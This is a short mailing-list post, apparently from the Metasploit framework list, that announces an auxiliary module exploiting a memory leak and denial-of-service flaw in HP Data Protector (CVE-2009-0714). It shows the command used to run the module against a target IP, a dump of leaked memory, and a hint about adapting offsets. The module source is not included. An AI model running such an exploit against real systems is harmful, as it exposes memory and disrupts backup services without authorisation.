CVE-2009-0714: HP Dataprotector memory leak/Dos Exploit

[nicky.coder at gmail.com (Nicky)]

Hi,

Some more information.

HP Data protector is a backup software. This software uses some proprietary
protocols for client-server communication.

This test module has been tested for windows version only. Other versions
may also be affected. In that case, it would only be a matter of identifying
the offset_value for each version.

Hope this helps.
Thanks


On Sun, Jun 21, 2009 at 10:43 PM, Nicky <nicky.coder at gmail.com> wrote:

> Hi,
>
> An auxiliary module for the HP data protector is attached. An output of
> module is shown below
>
> n at n-laptop:/mnt/projects/metasploit$ ./msfcli
> auxiliary/admin/dataprotector/hp_dataprotector RHOST=172.16.145.129
> MEMORY=0x7ffdf000 E
> [*]Please wait while we load the module tree...
> [*] Starting Memory Address: 0x7ffdf000
> [*] Leaking Memory: 0x7ffdf000 ->  0x12fbc4
> [*] Leaking Memory: 0x7ffdf004 ->  0x130000
> [*] Leaking Memory: 0x7ffdf008 ->  0x12d000
> [*] Leaking Memory: 0x7ffdf00c ->  0x0
> [*] Leaking Memory: 0x7ffdf010 ->  0x1e00
> [*] Leaking Memory: 0x7ffdf014 ->  0x0
> [*] Leaking Memory: 0x7ffdf018 ->  0x7ffdf000
> [*] Leaking Memory: 0x7ffdf01c ->  0x0
> [*] Leaking Memory: 0x7ffdf020 ->  0x674
> [*] Leaking Memory: 0x7ffdf024 ->  0xa8
> [*] Leaking Memory: 0x7ffdf028 ->  0x0
> [*] Leaking Memory: 0x7ffdf02c ->  0x0
> [*] Leaking Memory: 0x7ffdf030 ->  0x7ffd5000
> [*] Leaking Memory: 0x7ffdf034 ->  0x0
> [*] Leaking Memory: 0x7ffdf038 ->  0x0
> [*] Leaking Memory: 0x7ffdf03c ->  0x0
> [*] Leaking Memory: 0x7ffdf040 ->  0xe20abeb0
> [*] Leaking Memory: 0x7ffdf044 ->  0x0
> [*] Leaking Memory: 0x7ffdf048 ->  0x0
> [*] Leaking Memory: 0x7ffdf04c ->  0x0
>
>
> Thanks,
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20090621/f4ce4d3d/attachment.htm>